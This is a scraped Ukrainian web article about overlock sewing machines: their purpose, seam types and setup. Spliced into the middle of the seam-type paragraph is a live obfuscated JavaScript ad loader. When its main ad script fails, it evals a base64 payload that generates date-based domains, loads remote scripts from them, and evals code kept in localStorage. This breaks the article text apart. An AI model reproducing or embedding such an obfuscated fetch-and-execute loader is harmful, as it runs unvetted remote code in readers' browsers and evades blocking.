Призначення, різновиди та принцип роботи оверлоків

Для виготовлення одягу потрібна не лише стандартна швейна машинка. Щоб зробити річ максимально стильною та акуратною, потрібна наявність величезної кількості спеціального обладнання. Одним з них є оверлок, який займається обробкою країв виробу та лінією зрізу.

Принцип роботи та різновиди оверлока

Це прототип звичайної швацької машинки, який використовується для проведення обробки лінії зрізу для різних типів тканин. Сучасні оверлоки використовують для того, щоб виготовляти трикотажний одяг, а також для пошиття моделей з досить еластичних тканин.

Принцип роботи оверлока:

В основі роботи цієї спеціальної машини лежить одночасне зрізання кромки, з наступною обробкою деталі по лінії зрізу, а також по обраним швам. Цей принцип роботи досить умовний та спрощений. Зазвичай таке обладнання використовують лише для виготовлення одягу з еластичних тканин. Але тканини, які чудово драпіруються, дуже нестійкі під час носіння.

Тобто такі тканини можуть кошлатитися, через випадання ниток у місці зрізу. Щоб припинити процес висипання ниток, використовують оверлок. Його застосовують для того, щоб обробляти зріз без зшивання деталей. Оверлоки відрізняються кількістю швів, які накладаються під час роботи.

Основні типи швів: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Тринитковий. Зазвичай його використовують для того, щоб просто обробити зріз якоїсь деталі. Шов не має на увазі з’єднання декількох деталей в одну.Чотирьох нитковий шов. Саме цей варіант використовується для того, щоб зрізати та обробляти кінчики деталі. П’ятинитковий шов використовують для виготовлення одягу зі щільних тканин, коли потрібна підвищена міцність обробки. Зазвичай його використовують при виготовленні сумок або туристичних рюкзаків та палаток. Особливості роботи з оверлоком

Щоб обладнання працювало коректно, потрібно перед початком роботи виконати його налаштування. Для цього необхідно підняти лапку, а також підкласти край тканини під лапку. Після цього виконується процес з’єднання, а також зрізання зайвої частини тканини. Натискаючи на педаль, швачка може одночасно з’єднувати та зрізати зайві частини тканини.

Це обладнання для професіоналів, які займаються швейною діяльністю. Тобто купувати настільки дорогу апаратуру для любителів не варто. Обробку країв можна виконувати з використанням звичайної швацької машини, шляхом складання тканини у два рази і прокладаючи шов. Звичайно, обробка оверлоком — це дуже якісна маніпуляція, яка повністю виключає можливість розходження шва.

Найбільш дорогі моделі відрізняються наявністю комп’ютерного управління. Це складні машини, які працюють з мінімальною участю оператора. Зазвичай використовують у великих виробництвах та на фабриках, які виготовляють одяг великими партіями. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/priznachennya-riznovidi-ta-printsip-roboti-overlokiv/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top